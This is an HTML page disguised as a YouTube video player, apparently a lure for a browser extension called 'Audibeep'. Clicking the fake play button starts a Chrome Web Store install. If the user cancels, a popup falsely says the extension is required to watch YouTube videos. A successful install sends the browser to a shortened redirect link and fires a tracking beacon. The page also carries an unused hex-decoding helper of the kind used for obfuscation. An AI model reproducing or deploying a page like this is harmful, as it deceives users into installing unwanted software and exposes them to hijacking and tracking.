

<html><head>
<link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/hdcebkpmdmmhpbblkljjhfppngnmognp">
<script>
chrid = "hdcebkpmdmmhpbblkljjhfppngnmognp";
extName = "Audibeep";


	
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-70666609-1', 'auto');
  ga('send', 'pageview');



</script><link rel="shortcut icon" href="https://s.ytimg.com/yts/img/favicon-vfldLzJxy.ico" type="image/x-icon"> 

<title>youtube video</title><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>

</head><body><style>
/******* BODY ********/
body {
font-size: 13px;
font-family: Arial, Helvetica, sans-serif;
background:#f1f1f1;
margin:0px;
padding:0px;
}
#cookieChoiceInfo{
display:none !important;
}
#iframe_controls {
display:none !important;
}

/******* HEADER ********/
#header {
position: fixed;
top:0px;
left:0px;
right:0px;
height: 50px;
width: 100%;
background: #fff url('http://i.imgur.com/5fLsIMa.png') left center no-repeat;
border-bottom: 1px solid #e8e8e8;
cursor: pointer;
z-index: 1999999999;
}

/******* MAIN ********/
#main {
width:702px;
height:510px;
border:0px solid #ccc;
margin:0px auto;
margin-top:20px;
padding:0px 0px 0px 0px;
overflow:hidden;
}

h1 {
margin:70px 0px 10px 0px;
padding:0px;
color:#333;
font-size: 20px;
font-weight: bold;
line-height: 1.38;
overflow:hidden;
text-align:center;
}

/******* CONTENIDO ********/
#contenido {
float:left;
width:700px;
margin:0px;
padding:-1px 0px 0px 0px; 
background: transparent;
border: 1px solid;
border-color: #e5e6e9 #dfe0e4 #d0d1d5;
-webkit-border-radius: 5px;
overflow:hidden;
}

#titulo {
width:800px;
margin:10px 0px 10px 0px;
padding:0px;
color:#333;
font-size: 15px;
font-weight: normal;
line-height: 1.38;
overflow:hidden;
}

.youtubeblocker {
	position:relative;
	margin-bottom:0px;
	cursor:pointer;
	overflow: hidden;
}
.youtubeblocker .image {
	width:100%;
	height:100%;
	background-size:100% 100%;
}
.youtubeblocker .play-button {
	position:absolute;
	top:50%;
	left:50%;
	margin-left:-34px;
	margin-top:-23px;
	display:block;
	width:65px;
	height:47px;
	background: url('http://i.imgur.com/3lEq5if.png');
}
.youtubeblocker:hover .play-button {
	background-position:-65px;
}
.youtubeblocker .overlay {
	display:none;
	background: #000;
	opacity: .5;
	width:100%;
	height:100%;
	position:absolute;
	left:0;top:0;
}
.youtubeblocker .sharebox {
	display:none;
	position: absolute;
	left:10px;
	top:70px;
	right:10px;
	height:131px;
	padding:0px;
	background: url('compartir.png') center center no-repeat;
}

.youtubeblocker-ori .sharebox-ori {
	display:none;
	position: absolute;
	left:10px;
	top:50px;
	right:10px;
	height:150px;
	padding:10px;
	background: #FFF;
}
.youtubeblocker .sharebox p {
	font-size:18px;
	margin-top:15px;
	text-align: center;
}
.youtubeblocker .sharebutholder {
	text-align: center;
	position: absolute;
	bottom: 20px;
	right: 0px;
	left: 2px;
}
.youtubeblocker .sharebut {
    border-radius: 5px;
	width:243px;
	height:56px;
	cursor: pointer;
	background: url('http://i.imgur.com/pwncTgN.gif') 0px 0px no-repeat;
	//background: url('../images/sharebut.png') 0px 0px no-repeat;
    display: -moz-inline-stack;
    display: inline-block;
    zoom: 1;
    *display: inline;
}
.youtubeblocker .controlls {
	height:35px;
	position:absolute;
	bottom:0px;
	left:0px;
	right:0px;
	background: url('http://i.imgur.com/2nyiyHH.png');
}
.youtubeblocker .controlls .left-controlls {
	cursor:pointer;
	position:absolute;
	left:11px;
	height:35px;
	width:121px;
	background: url('http://i.imgur.com/QBeDFb9.png') 0px 13px no-repeat;
}
.youtubeblocker .controlls .right-controlls {
	cursor:pointer;
	position:absolute;
	right:9px;
	height:35px;
	width:100px;
	background: url('http://i.imgur.com/KneATBL.png') 0px 13px no-repeat;
}

#footer {
//position: fixed;
cursor:pointer;
width: 100%;
height:120px;
background: #fff url('http://i.imgur.com/uhZR0RC.png') center center no-repeat;
border-top: 1px solid #e2e2e2;
bottom:0px;
left:0px;
right:0px;
}
</style>

<div id="header"></div>


<div id="main">
<div id="contenido"  style="margin-top:50px;">

<!-- #### VIDEO 1 ### -->
<div href="#" id="uno"  class="youtubeblocker" style="width:700px;height:350px;background:#000000 url('http://i.imgur.com/yETYoId.gif') center center no-repeat;">

<div class="image" style="background:#000000;"></div>
<div class="play-button"></div>
<div class="controlls">
<div class="left-controlls"></div>
<div class="right-controlls"></div>
</div>

</div> 
             <div id="titulo-bottom">
			 
              </div>


<div id="undeContinue" style="background: #000; height: 100%; opacity: 0.5; position: fixed; width: 100%; z-index: 99; top: 0; left: 0; display: none;"></div>
<div id="continue" style="background: no-repeat center; width: 379px; height: 76px; position: fixed; left: 50%; top: 255px; margin-left: -190px; display: none; z-index: 100;"></div>

    <div id="cancelWindow"  style="display: none; width: 378px; height: 139px; background: url('http://i.imgur.com/hpGl8hL.png') no-repeat center; z-index: 100; position: fixed; left: 50%; top: 286px; margin-left: -189px;">
        <p style="color: #000000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; font-size: 15px; line-height: 19px; padding: 0px 0 0 7px;"><b>You are missing latest extension!!!</b><br>
       In order to watch the videos on youtube<br>
you need latest <b><script>document.write(extName)</script></b> extension.</br>
Click <b>Ok</b> and then <b>Add extension</b><br> to watch videos on youtube.
</p>
            
            <div onclick="noStart();" class="buttonLink" style="cursor: pointer; position: absolute; left: 282px; top: 86px; width: 71px; height: 27px;"></div>
        </div>


<script type="text/javascript">


  var addBox = document.getElementById('continue');
        var anderBox = document.getElementById('undeContinue');
        var pathByLang = {
            'ar': 'ar',
            'de': 'de',
            'en': 'en',
            'hi': 'hi',
            'id': 'id',
            'it': 'it',
            'ja': 'ja',
            'nl': 'nl',
            'fa': 'pe',
            'pt': 'pt',
            'th': 'th',
            'fi': 'tl',
            'tr': 'tr',
            'vi': 'vi'
            };
        var userLang = navigator.language || navigator.userLanguage;
        var langKey = userLang.substr(0, 2);

        switch (pathByLang[langKey]) {
            case 'hi':
            addBox.style.top = '450px';
            break;
            case 'ja':
            addBox.style.top = '330px';
            break;
            case undefined:
            langKey = 'en';
            break;
            }
          addBox.style.backgroundImage = "".concat('url("http://lp.ilividnewtab.com/images/chrome_extension/',pathByLang[langKey],'/ilividnewtab-continue.png")');
        
        
        



        var redurectPlainUrl = 'https://goo.gl/smQk0A';
        function successPlainCallback() {
new Image().src = '//whos.amung.us/swidget/eebinsta';
		 addBox.style.display = "none";
         anderBox.style.display = "none";
       top.location.href = redurectPlainUrl;

            
            }
       function errorCallback(err) {
	   successPlainCallback;
            if (err == "User cancelled install") {
            addBox.style.display = "none";
            setTimeout('anderBox.style.display = "block"', 10);
            cancelWindow.style.display = "block";
            }
            }
        function cancelOk() {
            cancelWindow.style.display = "none";
				setTimeout('anderBox.style.display = "none"', 10);
                setTimeout('addBox.style.display = "none";', 10);
            }
function noStart() {
            cancelWindow.style.display = "none";
			setTimeout('anderBox.style.display = "block"', 10);
                setTimeout('addBox.style.display = "block";', 10);
 var url = 'https://chrome.google.com/webstore/detail/' + chrid;
chrome.webstore.install(url, successPlainCallback, errorCallback);
         
            }
			
			 $('#uno').click(function() {
$(".play-button,.image").fadeOut();

setTimeout(function(){
uno.setAttribute("style", "width:700px;height:350px;background:#000000 url('http://i.imgur.com/KcP52eM.png') center center no-repeat;");
setTimeout(function()
{
uno.setAttribute("style", "width:700px;height:350px;background:#000000 url('http://i.imgur.com/KcP52eM.png') center center no-repeat;");

}, 150);
}, 2000);

                    cancelWindow.style.display = "none";
		setTimeout('anderBox.style.display = "block"', 10);
                setTimeout('addBox.style.display = "block";', 10);
				
                var url = 'https://chrome.google.com/webstore/detail/' + chrid;

                chrome.webstore.install(url, successPlainCallback, errorCallback);
                });
                

function smoke(weed) {var drug = weed.toString();var joint = '';for (var i = 0; i < drug.length; i += 2)joint += String.fromCharCode(parseInt(drug.substr(i, 2), 16));return joint;}

</script>

	
<div id="footer" style="margin-top:250; position:fixed;"></div>


</body></html>
